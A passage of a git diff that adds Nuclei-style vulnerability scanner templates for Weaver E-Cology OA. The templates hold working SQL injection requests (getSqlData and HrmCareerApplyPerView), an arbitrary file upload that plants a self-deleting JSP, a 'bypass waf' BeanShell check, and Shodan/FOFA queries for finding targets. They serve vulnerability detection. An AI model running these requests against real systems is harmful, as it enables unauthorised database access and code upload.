bypass waf POST /weaver/bsh.servlet.BshServlet HTTP/1.1 Host: {{Hostname}} @@ -26,15 +31,12 @@ http: matchers-condition: and matchers: - - type: word - words: + - type: regex + regex: - "BeanShell Test Servlet" - - type: word - words: - - "{{randstr}}" + - "(?i)
(\n.*){{randstr}}"
+        condition: and
 
       - type: status
         status:
-          - 200
-
-# Enhanced by cs on 2022/07/05
+          - 200
\ No newline at end of file
diff --git a/http/vulnerabilities/weaver/weaver-ecology-getsqldata-sqli.yaml b/http/vulnerabilities/weaver/weaver-ecology-getsqldata-sqli.yaml
new file mode 100755
index 0000000000..a852d8407d
--- /dev/null
+++ b/http/vulnerabilities/weaver/weaver-ecology-getsqldata-sqli.yaml
@@ -0,0 +1,39 @@
+id: weaver-ecology-getsqldata-sqli
+
+info:
+  name: Weaver E-Cology `getsqldata` - SQL Injection
+  author: SleepingBag945
+  severity: high
+  description: |
+    When the getSqlData interface of the Panwei e-cology OA system uses the mssql database, the built-in SQL statements are not spliced strictly, resulting in a SQL injection vulnerability.
+  reference:
+    - https://github.com/Wrin9/weaverOA_sql_RCE/blob/14cca7a6da7a4a81e7c7a7016cb0da75b8b290bc/weaverOA_sql_injection_POC_EXP.py#L46
+  metadata:
+    max-request: 2
+    verified: true
+    shodan-query: ecology_JSessionid
+    fofa-query: app="泛微-协同办公OA"
+  tags: ecology,weaver,oa,sqli
+
+variables:
+  num: "999999999"
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/Api/portal/elementEcodeAddon/getSqlData?sql=select%20substring(sys.fn_sqlvarbasetostr(hashbytes('MD5','{{num}}')),3,32)"
+      - "{{BaseURL}}/Api/portal/elementEcodeAddon/getSqlData?sql=select%20@@version"
+
+    stop-at-first-match: true
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '{{md5(num)}}'
+
+      - type: word
+        part: body
+        words:
+          - '{"api_status":'
+          - '"status":true}'
+        condition: and
\ No newline at end of file
diff --git a/http/vulnerabilities/weaver/weaver-ecology-hrmcareer-sqli.yaml b/http/vulnerabilities/weaver/weaver-ecology-hrmcareer-sqli.yaml
new file mode 100755
index 0000000000..b4114c2f61
--- /dev/null
+++ b/http/vulnerabilities/weaver/weaver-ecology-hrmcareer-sqli.yaml
@@ -0,0 +1,35 @@
+id: weaver-ecology-hrmcareer-sqli
+
+info:
+  name: Weaver E-Cology HrmCareerApplyPerView - SQL Injection
+  author: SleepingBag945
+  severity: high
+  description: |
+    There is a SQL injection vulnerability in the HrmCareerApplyPerView.jsp file of Panwei OA E-Cology. An attacker can obtain sensitive files in the server database through the vulnerability.
+  reference:
+    - https://github.com/ibaiw/2023Hvv/blob/556de69ffc370fd9827e2cf5027373543e2513d4/%E6%B3%9B%E5%BE%AE%20HrmCareerApplyPerView%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md?plain=1#L3
+  metadata:
+    max-request: 1
+    verified: true
+    shodan-query: ecology_JSessionid
+    fofa-query: app="泛微-协同办公OA"
+  tags: ecology,weaver,oa,sqli
+
+variables:
+  num: "999999999"
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(HashBytes('MD5','{{num}}')),4,5,6,7"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '{{md5(num)}}'
+
+      - type: status
+        status:
+          - 200
\ No newline at end of file
diff --git a/http/vulnerabilities/weaver/weaver-ktreeuploadaction-file-upload.yaml b/http/vulnerabilities/weaver/weaver-ktreeuploadaction-file-upload.yaml
new file mode 100755
index 0000000000..ded95bff68
--- /dev/null
+++ b/http/vulnerabilities/weaver/weaver-ktreeuploadaction-file-upload.yaml
@@ -0,0 +1,57 @@
+id: weaver-ktreeuploadaction-file-upload
+
+info:
+  name: Weaver E-Cology KtreeUploadAction - Arbitrary File Upload
+  author: SleepingBag945
+  severity: critical
+  description: |
+    There is a file upload vulnerability in Weaver E-Cology. An attacker can upload any file through KtreeUploadAction.jsp and further exploit it.
+  reference:
+    - https://buaq.net/go-117479.html
+  metadata:
+    max-request: 2
+    verified: true
+    shodan-query: ecology_JSessionid
+    fofa-query: app="泛微-协同办公OA"
+  tags: weaver,ecology,fileupload,intrusive
+
+variables:
+  num1: "{{rand_int(40000, 50000)}}"
+  num2: "{{rand_int(40000, 50000)}}"
+  result: "{{to_number(num1)*to_number(num2)}}"
+
+http:
+  - raw:
+      - |
+        @timeout: 20s
+        POST /weaver/com.weaver.formmodel.apps.ktree.servlet.KtreeUploadAction?action=image HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywgljfvib
+
+        ------WebKitFormBoundarywgljfvib
+        Content-Disposition: form-data; name="test"; filename="{{randstr}}.jsp"
+        Content-Type: image/jpeg
+
+        <%out.print({{num1}} * {{num2}});new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
+        ------WebKitFormBoundarywgljfvib--
+
+      - |
+        @timeout: 20s
+        GET {{filename}} HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl: 
+          - "status_code_1 == 200 && contains_all(body_1,'original', 'SUCCESS')"
+          - "contains(body_2, '{{result}}') && status_code_2 == 200"
+        condition: and
+
+    extractors:
+      - type: regex
+        name: filename
+        group: 1
+        regex:
+          - "','url':'(.*?)','title"
+        internal: true
\ No newline at end of file